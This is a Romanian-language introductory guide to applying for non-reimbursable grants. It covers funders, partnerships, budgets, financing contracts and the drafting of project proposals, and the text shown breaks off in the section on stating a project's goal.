Ghid introductiv finantari nerambursabile

Ghid introductiv finantari nerambursabile

I. Finantari nerambursabile

I.1. De ce acorda finantari nerambursabile diferite institutii sau ONG-uri?

I.2. Cum functioneaza sistemul finantarilor nerambursabile?

I.3. Care sunt principalii finantatori?

I.4. Ce este un grant?

I.5. Ce doresc finantatorii?

I.6. Am nevoie de parteneri?

I.7. Cum arata un contract de parteneriat?

I.8. Cum pot construi un parteneriat viabil?

I.9. Ce pasi trebuie intreprinsi in vederea participarii la licitatii?

I.10. Ce contine pachetul informativ?

I.11. Cum construiesc bugetul unei activitati?

I.12. Ce se intampla dupa castigarea unui grant?

I.13. in ce conditii pot primi banii dupa castigarea unui proiect?

I.14. Ce contine un contract de finantare?

I.15. Ce relatii trebuie sa am cu finantatorul?

II. Realizarea unui proiect propus spre finantare nerambursabila

II.1. Cum aleg un program de finantari?


II.2. Ce cuprinde un proiect de finantare?

II.3. Cum construiesc schema unui proiect?

II.4. Cum se construieste un proiect?

II.5. Cum exprimam scopul proiectului?

II.6. Ce sunt obiectivele unui proiect?

II.7. Ce cuprind activitatile unui proiect?

II.8. Cum construim un plan de evaluare?

II.9. Cum pregatim bugetul unui proiect?

II.10. Cum justificam proiectul?

II.11. Cum demonstram durabilitatea proiectului?

II.12. Ce contine o introducere intr-o prezentare de proiect?

II.13. Cum stabilim titlul unui proiect?

II.14. Ce cuprinde un rezumat de proiect?

II.15. Cum prezint obiectivele?

II.16. Cum prezint resursele?

II.17. Cum se evalueaza proiectele participante la licitatii?

II.18. Care sunt caracteristicile unui proiect de succes?

II.19. Cum se implementeaza un proiect castigator?

I. Finantari nerambursabile

I.1. De ce acorda finantari nerambursabile diferite institutii sau ONG-uri?

Finantarile nerambursabile sunt destinate sprijinirii desfasurarii unor activitati – importante pentru anumite segmente ale societatii sau pentru dezvoltarea de ansamblu a organismului economic si social – din domenii pentru care, din cauza situatiei conjuncturale, nu exista resurse financiare suficiente accesibile in mod curent (de exemplu, reabilitarea infrastructurii in regiuni sarace, recalificare profesionala, sprijinirea dezvoltarii sectorului ONG in calitate de partener al autoritatilor publice) sau din domenii in care exista in mod traditional o nevoie de resurse financiare mai mare decat disponibilitatile (de exemplu, activitatile cu caracter social).

Cele mai multe finantari de acest tip sunt acordate Romaniei de alte state sau institutii internationale.

Sistemul finantarilor nerambursabile publice externe este una din componentele mecanismelor mai ample de colaborare dintre diverse state, el avand caracterul unui ajutor acordat pentru sprijinirea rezolvarii unor situatii exceptionale in care statul beneficiar al acestui ajutor nu are expertiza sau resursele umane si materiale necesare pentru a incerca o rezolvare eficienta pe cont propriu.

Din acest motiv, resursele financiare propriu-zise sunt insotite de o intreaga metodologie specifica care trebuie respectata in procesul de acordare a finantarilor si prin care se urmareste implementarea unor elemente de filosofie sociala care si-au dovedit validitatea in situatii similare intalnite in alte state.

I.2. Cum functioneaza sistemul finantarilor nerambursabile?

Pentru a putea intelege cum demareaza si se deruleaza un program de finantare nerambursabila va prezentam etapele de “viata” ale acestuia:

  1. In prima etapa, finantatorul stabileste – inclusiv prin colaborare cu autoritati ale statului care va beneficia de respectivele finantari (in cazul unor programe masive de finantare, de exemplu cele ale Uniunii Europene sau cele ale Bancii Mondiale) – domeniul sau domeniile vizate si obiectivele pe care intentioneaza sa le realizeze, activitatile si beneficiarii potentiali pe care este dispus sa-i finanteze din resursele sale.

    In aceasta etapa este elaborata metodologia care va permite selectia prin licitatie publica de proiecte si finantarea efectiva a activitatilor care asigura indeplinirea in conditii cat mai bune a obiectivelor finantatorului.

  2. Etapa a doua este r
    eprezentata de licitatia de proiecte.

    Finantatorul lanseaza in mod public programul de finantare respectiv, oferind tuturor celor interesati un pachet informativ care contine un ghid al programului (explicand mai detaliat ce intentioneaza sa realizeze programul si ce conditii trebuie sa indeplineasca cei care vor sa incerce sa obtina resurse financiare din aceasta sursa, in particular data limita pana la care pot fi depuse proiecte in vederea participarii la licitatie, limitele minime si maxime ale sumelor care pot fi solicitate printr-un singur proiect, intervalul de timp pentru care se asigura finantarea pentru proiectele castigatoare (de exemplu, durata activitatii trebuie sa nu depaseasca 6, 12, sau 18 luni sau/si activitatile pot fi finantate numai pana la o anumita data calendaristica) si o cerere de finantare (de regula sub forma unui formular standardizat); in cazul anumitor programe de finantare, pachetul informativ include si alte documente (modelul de plan de afaceri acceptat de finantator, niveluri maxime acceptate pentru cheltuielile de natura diurnelor etc.).

    Solicitantii depun proiectele de activitati pentru care solicita finantari nerambursabile realizate in conformitate cu conditiile prezentate in ghidul programului.

  3. Dupa expirarea perioadei de timp in care pot fi depuse proiectele, acestea sunt evaluate de catre comisia de evaluare constituita in etapa intai, fiecarui proiect fiindu-i acordat un anumit punctaj, functie de lista de criterii utilizata de comisie (criterii prezentate solicitantilor, de regula, in cadrul pachetului informativ).

    Proiectele sunt apoi ierarhizate descrescator in functie de punctajul obtinut, fiind declarate castigatoare proiectele care au obtinut punctajele cele mai mari si care solicita, in total, o suma mai mica sau egala cu bugetul total oferit de finantator pentru programul de finantare respectiv.

  4. Cea de-a patra etapa este reprezentata de perioada de implementare a proiectelor pentru care a fost obtinuta finantarea nerambursabila.
  5. Etapa finala este cea de evaluare.

I.3. Care sunt principalii finantatori?

Pentru a vedea toate programele de finantare oferite de finantatorii din Romania, accesati sectiunile Calendarul finantarilor nerambursabile si Catalogul creditelor.

Daca va intereseaza finantarile nerambursabile pentru un anumit tip de organizatie, consultati Finantarile nerambursabile pentru IMM, Finantarile nerambursabile pentru APL sau Finantarile nerambursabile pentru ONG.

Principalele categorii de finantatori activi in Romania sunt: Uniunea Europeana, Guvernul Romaniei, guvernele sau ambasadele unor state straine, bancile si institutii financiare internationale (de ex.: BERD, Banca Mondiala), bancile active in Romania, fundatii sau alte organizatii internationale cu statut asemanator (de ex.: Fundatia “Soros”), mari corporatii (de ex.: Microsoft, Coca-Cola).

I.4. Ce este un grant?

Grantul reprezinta suma de bani acordata drept finantare nerambursabila pentru indeplinire unui scop anume.

I.5. Ce doresc finantatorii?

Finantatorii urmaresc atingerea unor obiective generale (economice, sociale, culturale) prin sprijinirea financiara a activitatilor unor organizatii (firme, ONG, institutii publice etc.) sau persoane.

Obiectivele si metodele acceptate de finantator pentru indeplinirea acestora trebuie foarte bine cunoscute de catre solicitantul de finantare.

I.6. Am nevoie de parteneri?

Foarte adesea, finantatorii doresc sa sprijine intr-o masura mai mare activitati realizate in cadrul unor parteneriate, organizate pe criterii de eficienta economica si sociala pornind de la complementaritatea care exista sau poate fi dezvoltata intre activitatea diversilor actori sociali.

Ca un indiciu in acest sens, puteti observa printre criteriile de evaluare a proiectelor din cadrul multor programe de finantare existenta unui punctaj acordat special pentru realizarea si modul de functionare a eventualului parteneriat organizat in cadrul proiectului, chiar daca nu se solicita in mod obligatoriu acest lucru.

in anumite cazuri, organizarea unui parteneriat este solicitata in mod expres celor care doresc sa acceada la finantarea nerambursabila oferita.

in toate situatiile insa, calitatea parteneriatului – si nu doar simpla existenta a unei organizatii partenere – este determinanta in obtinerea unor punctaje maxime.

Partenerii externi organizatiei care se vor implica in proiect trebuie specificati clar, inclusiv cu precizarea zonelor de activitate, a gradului de implicare si a modului de colaborare cu organizatia care realizeaza proiectul.

Un proiect este, de fapt, un sistem complex pe care numai cu dificultate o organizatie il poate pune singura in miscare astfel incat sa-si atinga scopul.

in situatia in care exista alti finantatori, acestia constituie nu numai o garantie a posibilitatilor de functionare si extindere a proiectului, dar chiar a viabilitatii sale, deoarece intereseaza mai multe categorii de persoane.

Finantatorii care sunt solicitati sa cofinanteze un proiect vor trebui selectati in asa fel incat politicile lor sa coincida, pe cat posibil, cu cele ale finantatorului principal.

I.7. Cum arata un contract de parteneriat?

Va prezentam in continuare un model de declaratie de parteneriat intalnit in programele de finantare derulate de Uniunea Europeana.

Bineinteles, daca pachetul informativ oferit de finantatorul care va intereseaza cuprinde un alt model, este obligatorie utilizarea acestuia din urma.

MODEL – Declaratie de Parteneriat

I.8. Cum pot construi un parteneriat viabil?

Pentru a construi o relatie de parteneriat viabila ar trebui sa aveti in vedere urmatoarele aspecte:

  1. Alegeti activitati care raspund cat mai bine obiectivelor programului de finantare asa cum sunt ele prezentate in cadrul ghidului programului.
  2. Acordati timp suficient analizei activitatii/activitatilor pentru care doriti sa organizati un parteneriat, pentru a putea identifica punctele tari si punctele slabe, avantajele si dezavantajele pe care le inregistreaza organizatia solicitanta in desfasurarea acestor activitati, tinand cont de contextul economic si social de ansamblu in care functioneaza ea.

    Partenerul/partenerii trebuie sa compenseze punctele slabe si dezavantajele solicitantului, astfel incat sa se raspunda si unor necesitati manifestate in mediul social in care va functiona activitatea (crearea de noi locuri de munca, atragerea unor categorii sociale defavorizate, difuzarea mai larga a informatiilor despre proiect etc. dupa caz).

  3. Selectati cu atentie organizatiile care pot indeplini aceste conditii si care raspund criteriilor de eligibilitate din ghidul programului (ghidul solicitantului etc.) alegand, in masura posibilului, parteneri cu care ati avut colaborari anterioare cat mai reusite – pe care va trebui sa le prezentati pe scurt in proiect – si cu care sunteti cat mai siguri ca puteti colabora si in activitatile pentru care solicitati finantare.

    Partenerii participanti in proiect trebuie sa participe inclusiv la realizarea proiectului care va participa la licitatie.

I.9. Ce pasi trebuie intreprinsi in vederea participarii la licitatii?

Dupa ce v-ati hotarat sa apelati la o finantare de acest gen, trebuie sa parcurgeti urmatoarele etape:

  1. Alegeti programele de finantare cele mai potrivite pentru specificul activitatilor dorite de dumneavoastra.
  2. Procurati-va pachetului informativ al programului de finantare.

    Descrierea detaliata a programului trebuie studiata cu atentie, astfel incat sa puteti stabili cu certitudine ca programul va poate fi de folos si ca indepliniti toate conditiile de eligibilitate pentru a putea participa la licitatie.

  3. Completati documentatia solicitata de finantator si colectati documentele necesare ca anexe obligatorii in cadrul proiectului.

    O atentie speciala trebuie acordata informatiilor anexe suplimentare – nesolicitate expres de finantator – care pot fi utilizate ca argumente in favoarea proiectului dumneavoastra (studii, date statistice, scheme, strategii guvernamentale in domeniile vizate de proiect etc.).

    Este recomandat sa incheiati aceasta etapa cu cel putin cateva zile inainte de data limita de depunere a proiectelor, pentru a dispune de timpul necesar pentru verificarea finala.

  4. Depuneti proiectul la adresa anuntata de finantator, inainte de data limita.

    In general, aceasta data limita se refera la ziua si ora la care proiectul este primit si inregistrat in evidentele finantatorului ca participant la licitatie si nu la data expedierii lui de la sediul solicitantului catre finantator (data postei). Aceasta situatie trebuie avuta in vedere de la inceput in planificarea realizarii proiectului, tinand cont de faptul ca serviciile de curierat (Posta Romana sau firmele private) au nevoie de cel putin 24 de ore pentru transportul coletelor intre localitati aflate in judete diferite.

  5. Analizati rezultatul licitatiei, comunicat de finantator fiecarui solicitant in parte.

    Pentru proiectele castigatoare, urmeaza implementarea propriu-zisa a proiectului, prin semnarea contractului de finantare intre finantator si solicitantul care a depus proiectul castigator.

    Pentru proiectele necastigatoare, este momentul analizei punctajului obtinut de proiect, etapa esentiala in cazul in care intentionati sa depuneti un alt proiect. Intre anumite limite, aceste concluzii sunt utile si atunci cand sunteti interesat ulterior de un alt program de finantare, chiar oferit de alt finantator.

Aici mai pot fi adaugate cateva sfaturi utile:

  1. Acordati tot timpul necesar pentru realizarea proiectului de finantare.

    De regula, in faza de inceput a proiectului este posibila aparitia unor situatii de subapreciere a efortului necesar, inclusiv ca urmare a capacitatii reduse de identificare clara si completa a tuturor informatiilor si documentelor necesare si utile pentru proiect.

    In plus, licitatiile de proiecte sunt lansate, uneori, cu putin timp inainte de termenul limita de depunere a proiectelor, iar centralizarea informatiilor necesare poate solicita un volum de munca suficient de mare pentru a justifica acordarea unui interval important de timp pentru realizarea proiectului.

  2. Porniti de la o idee de activitate identificata in prealabil ca fiind necesara pentru dumneavoastra (achizitia unui echipament mai performant, dezvoltarea unor activitati existente, initierea de noi activitati etc.) si care poate fi adaptata pentru cerintele specifice ale finantatorului, in loc de a imagina o activitate pornind de la cerintele ghidului de finantare.

    Astfel, veti economisi din timpul si efortul uman necesar pentru documentarea activitatii vizate care, fiind bine cunoscuta de dumneavoastra, poate fi prezentata si argumentata complet si convingator.

  3. Stabiliti o persoana care sa aiba in responsabilitate realizarea proiectului de finantare si un grup de colaboratori – in particular o persoana pentru legatura cu partenerul/partenerii din cadrul proiectului (de regula, este nevoie de mai multe persoane pentru a aduna in timp util toate informatiile necesare).
  4. Acumulati din timp toate informatiile semnificative care pot argumenta avantajele proiectului realizat de dumneavoastra.
  5. Clarificati in detaliu care sunt informatiile solicitate in cadrul cererii de finantare, inclusiv prin realizarea unor contacte si discutii cu persoanele special desemnate in acest scop de catre finantator.

I.10. Ce contine pachetul informativ?

Pachetul informativ contine, in general:

  1. Ghidul programului (ghidul solicitantului);
  2. Formularul cererii de finantare;
  3. Formularele documentelor anexe, care pot diferi functie de finantator si programul de finantare: modelul de buget al proiectului (uneori inclus in corpul cererii de finantare), matricea logica a proiectului, modelul de plan de afaceri acceptat de finantator, modelul de CV acceptat pentru membrii echipei proiectului, nivelurile maxime acceptabile ale cheltuielilor cu diurne, modelul contractului care urmeaza sa fie incheiat intre finantator si organizatiile castigatoare ale licitatiei de proiecte, anuntul de lansare a programului de finantare etc.

I.11. Cum construiesc bugetul unei activitati?

Pentru a realiza un buget cat mai realist aveti in vedere urmatoarele aspecte:

  1. Includeti toate cheltuielile absolut necesare.

    Bugetul trebuie sa fie fezabil – trebuie sa asigure functionarea activitatii in economia reala, nu doar pe hartie – deci trebuie stabilite si e
    stimate cat mai precis posibil toate categoriile de cheltuieli necesare pentru realizarea obiectivelor activitatilor respective, in conditiile de calitate necesare in proiect.

    Orice omisiune esentiala duce, in faza de implementare efectiva, fie la solicitarea de fonduri suplimentare peste cele aprobate, de multe ori echivalenta cu anularea proiectului, fie la solicitari de modificare a bugetului, acceptate de finantatori in mod exceptional si doar intre anumite limite.

  2. Nu supradimensionati cheltuielile peste strictul necesar.

    Rezervele pentru situatii neprevazute, atunci cand pot fi incluse in buget, au limite maxime acceptate de finantator.

    In afara de cheltuielile strict necesare, finantatorii nu sunt dispusi sa finanteze decat cheltuieli derivate sau legate de functionarea programului de finantare in ansamblu – cheltuieli de publicitate ale fiecarui proiect, cheltuieli de evaluare periodica a stadiului implementarii fiecarui proiect castigator etc., iar finantatorul nu ezita sa solicite modificarea bugetului atunci cand considera nejustificat de mari anumite cheltuieli (un posibil efect secundar al acestor modificari poate fi diminuarea contributiei proprii a solicitantului pana la un nivel la care proiectul devine neeligibil) sau decide sa acorde o suma mai mica decat cea solicitata initial prin proiect.

  3. Nu va stabiliti ca obiectiv solicitarea sumei maxime pe care o ofera finantatorul unui proiect.

    Pentru ca organizatia dumneavoastra sa obtina sume mai mari sub forma de finantari nerambursabile, depuneti mai multe proiecte, in cadrul aceluiasi program de finantare (dar pentru alte proiecte) sau in cadrul altor programe (totusi, finantatorii nu acorda sume pentru activitati care sunt finantate in paralel din sumele obtinute de la alt finantator sau din sursele solicitantului).

  4. Asigurati co-finantarea (contributia proprie), dovedind cu documente ca dispuneti de bunurile materiale si personalul (asa-numita “contributie in natura”) precum si de resursele financiare care reprezinta, ca valoare totala in bugetul proiectului, cel putin procentul minim solicitat de finantator.

    Incercati sa asigurati un nivel al acestei co-finantari mai mare decat procentul minim solicitat; o contributie proprie mai mare poate indica finantatorului interesul si seriozitatea cu care solicitantul trateaza activitatile din proiect (solicitantul este dispus sa riste o parte mai mare din propriile resurse in proiect) si asigura o marja de siguranta in cazul cand bugetul trebuie modificat la solicitarea finantatorului.

  5. Este posibil ca proiectul sa inceapa inainte ca suma oferita de finantator (de regula, aceasta suma se acorda in mai multe transe) sa soseasca. Contributia proprie a solicitantului trebuie sa poata acoperi cheltuielile de functionare ale proiectului in aceasta perioada.
  6. Tineti cont de faptul ca intregul proces de evaluare a proiectelor participante la licitatie, incheiere a contractelor de finantare si incepere efectiva a finantarii prin acordarea sumei solicitate dureaza cateva luni.

    Acest interval poate influenta unele categorii de cheltuieli; estimarea eventualelor venituri aduse de proiect trebuie sa tina cont de modificarea conjuncturii economice care poate interveni in aceasta perioada.

  7. Finantatorul aminteste, uneori, in cadrul prezentarii proiectului posibilitatea solicitantilor de a achizitiona pentru proiect echipamente din tara de origine a finantatorului.

    Este recomandat sa apelati la aceasta solutie atunci cand dispuneti de oferte competitive.

I.12. Ce se intampla dupa castigarea unei finantari nerambursabile (grant)?

Dupa ce proiectul depus de organizatia solcitanta este aprobat spre finantare, vor avea loc urmatoarele actiuni:

  1. Se semneaza contractul de finantare, in urma unei intalniri de informare detaliata a beneficiarilor (castigatorii licitatiei de proiecte) organizate de finantator.
  2. Se acorda prima transa din suma totala acordata ca finantare nerambursabila (dupa eventualele modificari ale bugetului) si se incepe activitatea proiectului.
  3. Beneficiarul realizeaza rapoarte periodice, care sunt remise spre analiza si aprobare finantatorului.
  4. in urma aprobarii rapoartelor periodice, sunt acordate celelalte transe din suma totala.
  5. Finantatorul poate efectua verificari la locul de desfasurare a proiectului; informatiile obtinute astfel vor fi utilizate in evaluarea proiectului.
  6. Dupa finalul proiectului, se realizeaza evaluarea finala a acestuia; la aceasta activitate participa atat beneficiarul cat si finantatorul.

I.13. In ce conditii pot primi banii dupa castigarea unui proiect?

Trebuie tinut cont de anumite aspecte:

  1. Suma obtinuta poate diferi de suma solicitata initial, in cazul in care finantatorul a solicitat modificarea bugetului.
  2. Finantarea va fi obtinuta numai dupa semnarea contractului de finantare intre finantator si beneficiar (castigator al licitatiei).
  3. De obicei, finantarea se acorda in mai multe transe, a caror valoare este stabilita in contractul de finantare.

    Prima transa este obtinuta imediat dupa semnarea acestui contract (desi uneori pot aparea situatii cand proiectul incepe conform planificarii aprobate in proiect, dar finantatorul nu a reusit sa acorde prima transa); fiecare transa suplimentara se acorda numai dupa aprobarea de catre finantator a unor rapoarte periodice realizate de catre beneficiar.

  4. Nerespectarea prevederilor contractului de finantare poate duce la intreruperea platilor efectuate de finantator, contributia acestuia poate fi diminuata, sau finantatorul poate solicita plata partiala sau in totalitate a sumelor deja platite.

I.14. Ce contine un contract de finantare?

Un contract de finantare detaliaza relatiile dintre finantator si beneficiar (solicitantul al carui proiect a fost declarat castigator).

Iata in continuare modelul unui asemenea contract de finantare. Bineinteles, fiecare finantator utilizeaza un model propriu, care poate diferi ca forma, structura sau continut de aceste exemple; in esenta insa, veti regasi aproximativ aceleasi categorii de informatii.

MODEL – Contract de Finantare

I.15. Ce relatii trebuie sa am cu finantatorul?

In principiu, respectati un model de buna practica caracterizat de:

  1. transparenta;
  2. schimb permanent de informatii cu finantatorul;
  3. respectarea regulilor stabilite de finantator.

II. Realizarea unui proiect propus spre finantare nerambursabila

II.1. Cum aleg un program de finantari?

Trebuie parcurse mai multe etape:

  1. Stabiliti o lista de idei generale de proiect legate de activitatea organizatiei dumneavoastra pentru care doriti sa solicitati finantare.

    Puteti incepe sa discutati ideile cu oamenii politici, functionarii si alte personalitati-cheie din zona dumneavoastra. Asemenea persoane vor fi in mod particular dispuse sa sustina un eventual proiect daca obiectivele lui au o legatura cu interesele acestor persoane si daca proiectul pare bine conceput si susceptibil de reusita. Chiar daca aveti destule resurse financiare pentru a va conduce proiectul spre realizare, un sprijin local este binevenit; uneori se poate dovedi chiar vital. Veti avea nevoie de bunavointa si influenta altor persoane daca lucrurile merg rau sau daca doriti sa lansati un alt proiect in aceeasi zona.

  2. Consultati sursele de informatii privitoare la programele de finantari nerambursabile aflate in desfasurare sau in pregatire pentru lansare.
  3. Analizati obiectivele si prioritatile diferitelor programe de finantare, criteriile de eligibilitate, criteriile de evaluare a proiectelor; evitati sa interpretati nejustificat de favorabil aceste criterii, pentru ca analiza comisiei de evaluare – singura care conteaza, in cele din urma – este neutra.
  4. Analizati tipurile de proiecte finantate anterior in cadrul programelor de finantare (atentie: de multe ori, finantatorul modifica unele caracteristici ale licitatiei curente de proiecte fata de licitatiile anterioare organizate in cadrul aceluiasi program de finantare).
  5. Analizati conditiile financiare: suma minima si maxima care poate fi solicitata, nivelul si structura contributiei cofinantarii care trebuie asigurata de solicitant.
  6. Identificati termenul limita de depunere a proiectelor de finantare.

Pentru o eficienta maxima a procesului de cautare de finantari, se recomanda dezvoltarea unui dialog cu finantatorii inainte de a incepe realizarea propriu-zisa a proiectului de finantare.

Utilizati adresele la care pot fi solicitate informatii suplimentare (de obicei, prin intermediul email-ului sau fax-ului) pentru a clarifica nelamuririle care apar pe parcursul procesului de realizare a proiectului de finantare.

Puteti avea in vedere mai multi finantatori pentru acelasi proiect, modificand partial proiectul pentru a raspunde solicitarilor specifice ale fiecaruia dintre ei.

In plus, unii finantatori doresc sa finanteze proiecte in colaborare cu alti finantatori.

Aveti permanent in vedere data limita de depunere a proiectelor.

Realizarea unui proiect de calitate presupune o coordonare destul de complexa; in plus, de foarte multe ori apar diverse situatii neprevazute care pot prelungi foarte mult finalizarea proiectului.

Calitatea proiectului depinde esential de calitatea persoanelor si resurselor utilizate, iar identificarea si atragerea in proiect a persoanelor cele mai potrivite pentru atingerea obiectivelor vizate poate necesita un timp destul de mare.

In alegerea programului de finantare trebuie sa tineti cont de planificarea interna a dezvoltarii organizatiei, adica activitatile pentru care solicitati finantare, tinand cont de faptul ca procesul de evaluare a proiectelor de finantare dureaza, de regula, cel putin 1 luna (pentru unele programe de finantare acest interval de timp putand fi chiar de mai multe luni).

In plus, in cazul castigarii licitatiei de proiecte, formalitatile legate de semnarea contractelor specifice necesare pentru inceperea efectiva a finantarii pot dura o perioada de cel putin inca 1 luna.

II.2. Ce cuprinde un proiect de finantare?

Cea mai importanta sarcina este realizarea cererii de finantare.

Conceptul care sta la baza acestei abordari este acela ca prin fragmentarea procesului in etape mici se simplifica rezolvarea sarcinii.

Atentie: NU pierdeti din vedere imaginea de ansamblu!

Ordinea in care este citita o propunere tipica nu este aceeasi cu cea in care ea trebuie elaborata.

Ordinea in care vi se cere sa va prezentati proiectul va poate conduce adesea pe o pista falsa.

Ordinea uzuala a partilor unei propuneri este construita pentru a creste acuratetea si intelegerea sa atunci cand este evaluata si este ineficienta daca este aplicata in procesul de scriere a propunerii.

Ordinea tipica a propunerii atunci cand este citita:

  • scrisoarea de intentie (separata de dosar);
  • pagina de titlu;
  • rezumat;
  • introducere;
  • problema vizata si scopul stabilit;
  • justificarea problemei;
  • obiective;
  • activitati;
  • evaluare durabilitate / finantari ulterioare;
  • buget
  • anexe.

Ordinea in care sunt abordate elementele propunerii atunci cand aceasta este elaborata:

“Elemente principale”

  • problema vizata si scopul stabilit;
  • obiective;
  • activitati;
  • evaluare;
  • buget.

“Elemente suplimentare”

  • justificarea problemei;
  • durabilitate / finantari ulterioare;
  • introducere;
  • pagina de titlu;
  • rezumat;
  • anexe.

Functie de experienta anterioara a solicitantului, activitatea de stabilire si obtinere a anexelor poate fi desfasurata in paralel cu activitatea de redactare a diferitelor componente ale proiectului.

In cazul finantarilor nerambursabile acordate prin programe ale Uniunii Europene, un proiect de finantare are, de regula, urmatoarele componente: cererea de finantare, bugetul proiectului (uneori inclus in formularul cererii de finantare), matricea logica a proiectului (uneori), CV-uri ale persoanelor care vor lucra in activitatile din proiect, documente doveditoare ale statutului juridic al solicitantului si partenerilor, anexe facultative (date statistice, grafice, studii, elemente ale unor strategii aflate in derulare sau in proiect, rezultate ale altor activitati relevante pentru proiect – in general, informatii care pot fi utilizate ca argumente pentru proiect).

II.3. Cum construiesc schema unui proiect?

Schema proiectului da atat o imagine clara a componentelor proiectului, cat si baza pentru constituirea unui sistem de monitorizare.

Obiectivele proiectului sunt descrise intr-o coloana care prezinta resursele consumate de proiect pentru a fi transformate in rezultate, resurse care contribuie la realizarea scopului proiectului si, in cele din urma, la realizarea misiunii proiectului.

Aceasta coloana, numita rezumat, este legata de a doua coloana, care defineste principalele ipoteze pe care se bazeaza conexiunile dintre resurse, rezultate, scopuri si misiune.

A treia coloana identifica indicatorii calitativi care masoara gradul de realizare a obiectivelor proiectului la diferite nivele.

In conte
xtul rezumatului, principalele elemente ale proiectului sunt definite ca misiuni, scopuri, rezultate si resurse.

Trebuie mentionate, insa, si cateva dintre limitele utilizarii schemei proiectului.

Ea nu poate inlocui procesele riguroase de formulare si apreciere a proiectului.

Proiectele sunt intreprinderi dinamice, iar schema proiectului descrie situatia la un moment dat.

Pericolul poate fi evitat, desigur, prin actualizarea schemei ori de cate ori situatia se schimba suficient de mult.

II.4. Cum se construieste un proiect?

In cazul unora dintre finantatori, inainte de realizarea propriu-zisa a proiectului de finantare, este necesara trimiterea unei scrisori de intentie, constand intr-o prezentare generala a proiectului care trebuie sa indice cu claritate relevanta problemei vizate si a solutiei propuse, perioada de desfasurare si costul estimativ.

Aceasta scrisoare are rolul de evita situatiile in care solicitantii consuma resurse importante pentru realizarea unor proiecte de finantare care insa au de la inceput sanse reduse de a fi aprobate (lipsa de interes a finantatorului pentru problema vizata prin proiect, credibilitate sau experienta insuficienta a solicitantului etc.).

Un raspuns pozitiv inseamna, practic, ca proiectul are sanse importante de succes, daca proiectul este realizat in conditii bune.

Pentru construirea proiectului se porneste de la informatiile cuprinse in pachetul informativ.

Activitatea trebuie concentrata in doua directii:

  1. Completarea formularelor obligatorii (cerere de finantare, buget, matrice logica, plan de afaceri etc.).
  2. Colectarea informatiilor anexa necesare (statut juridic al solicitantului si alte documente cu caracter juridic, CV-uri ale echipei proiectului, informatii care pot fi utilizate in argumentarea proiectului).

Ordinea in care sunt organizate informatiile intr-o cerere de finantare este ordinea optima pentru evaluarea sa.

Completarea cererii, insa, trebuie realizata in alta ordine, foarte utila in acest sens fiind matricea logica a proiectului (daca aceasta exista).

O ordine de elaborare a elementelor proiectului de finantare ar putea fi urmatoarea:

  1. Definirea problemei care trebuie rezolvata.

    In acest scop trebuie identificate problemele majore existente, dintre care trebuie selectata o singura problema care va fi vizata de proiectul dumneavoastra.

  2. Stabilirea scopului proiectului: de regula, reprezinta rezolvarea problemei sau stadiul la care dorim sa ajunga ea in urma derularii proiectului.

    Scopul trebuie sa fie unic si sa aiba o formulare concisa.

  3. Stabilirea obiectivelor proiectului: reprezinta etape care trebuie atinse pentru atingerea scopului (Atentie! Obiectivele reprezinta ceea ce doriti sa obtineti, nu ceea ce faceti pentru a obtine ceea ce doriti).

    Astfel, daca exista numai un singur mod de indeplinire a unui obiectiv pe care l-ati stabilit, este probabil sa fi stabilit de fapt o activitate.

  4. Stabilirea activitatilor.

    In aceasta etapa trebuie sa determinati ce anume trebuie facut pentru atingerea fiecarui obiectiv (stabilirea actiunilor), sarcinile care trebuie indeplinite in cadrul fiecarei actiuni (informatii esentiale in evaluarea necesarului de resurse si planificarea in timp), personalul necesar.

    Resursele utilizate in aceste activitati se vor regasi in buget.

    Aveti in vedere necesitatea argumentarii avantajelor si prezentarii riscurilor acestor activitati, demonstrand ca ati studiat si alte solutii posibile (eventual aplicate in alte situatii similare) atunci cand ati ales solutiile propuse in proiectul dumneavoastra.

  5. Stabilirea planului de evaluare.

    Evaluarea este necesara pentru a putea stabili in fiecare moment in ce conditii de calitate organizatia face ceea ce si-a propus.

    Evaluarea se concentreaza asupra a 4 aspecte majore: resurse investite in proiect, activitati desfasurate, rezultate obtinute, beneficii realizate.

    Pentru a putea fi realizata, ea necesita, de regula, informatii sistematice, ceea ce face necesara organizarea unei monitorizari a proiectului.

    Costurile monitorizarii si evaluarii trebuie incluse in bugetul proiectului.

  6. Realizarea bugetului.

    Categoriile principale de cheltuieli se refera la resurse umane, echipamente si bunuri, transport, cheltuieli administrative, alte costuri si servicii, costuri aferente cladirilor si terenurilor (uneori), rezerve pentru situatii neprevazute (uneori), fiecare categorie de cheltuieli trebuind sa fie detaliata in buget.

    Cheltuielile trebuie, de regula, grupate si functie de sursa din care vor fi acoperite: contributia solicitantului sau partenerilor, respectiv cofinantarea nerambursabila.

    Observatie: realizarea bugetului dureaza destul de mult timp, planificati-va corespunzator activitatea de realizare a proiectului.

    Uneori finantatorul nu ofera intreaga suma solicitata prin bugetul proiectului dumneavoastra, pentru ca nu a inteles argumentele privind necesitatea anumitor cheltuieli sau pentru ca a considerat suma nejustificat de mare.

    Daca acest lucru va afecta calitatea rezultatelor proiectului, comunicati acest lucru finantatorului.

  7. Justificarea proiectului: argumentati importanta si urgenta problemei vizate in proiect, avantajele pe care solutia de rezolvare propuse de proiect le care fata de alte alternative, capacitatea solicitantului si partenerilor de a desfasura proiectul.
  8. Durabilitatea proiectului (modul in care vor fi finantate activitatile din proiect dupa incheierea finantarii nerambursabile).

    Finantatorii sunt interesati, cel mai adesea, ca proiectele pe care le finanteaza sa traiasca cat mai mult timp, vor sa faca investitii pe termen lung.

    Continuarea proiectului poate fi finantata din alt grant al aceluiasi finantator sau acordat de alt finantator, venituri aduse de activitatile proiectului, alte surse de finantare.

    Daca intentionati sa solicitati pentru continuarea proiectului o alta transa de finantare, informati de la inceput finantatorul si argumentati foarte bine aceasta solicitare.

  9. Stabilirea titlului proiectului: trebuie sa atraga atentia, sa evidentieze rezultatele si avantajele proiectului, sa fie clar si concis, dar evitand acronimele si termenii tehnici sau de jargon.
  10. Realizarea rezumatului proiectului: trebuie sa cuprinda prezentarea problemei vizate, prezentarea solicitantului si a credibilitatii sale, prezentarea succinta a obiectivelor, a activitatilor si a metodologiei de evaluare, costul total al proiectului, a contributiei solicitantului si a cofinantarii solicitate, durabilitatea proiectului. Rezumatul este ultima componenta redactata.

II.5. Cum exprimam scopul proiectului?

Scopul unui proiect reprezinta, de regula, rezolvarea problemei sau stadiul in care dorim sa ajunga problema in urma derularii proiectului.

Recomandari:

  • enuntul sa fie scurt si concis;
  • nu trebuie sa apara necesitatea de a folosi conjunctia
    “si” pentru a desparti 2 propozitii; daca se intampla acest lucru, s-ar putea sa fie vorba de 2 scopuri;
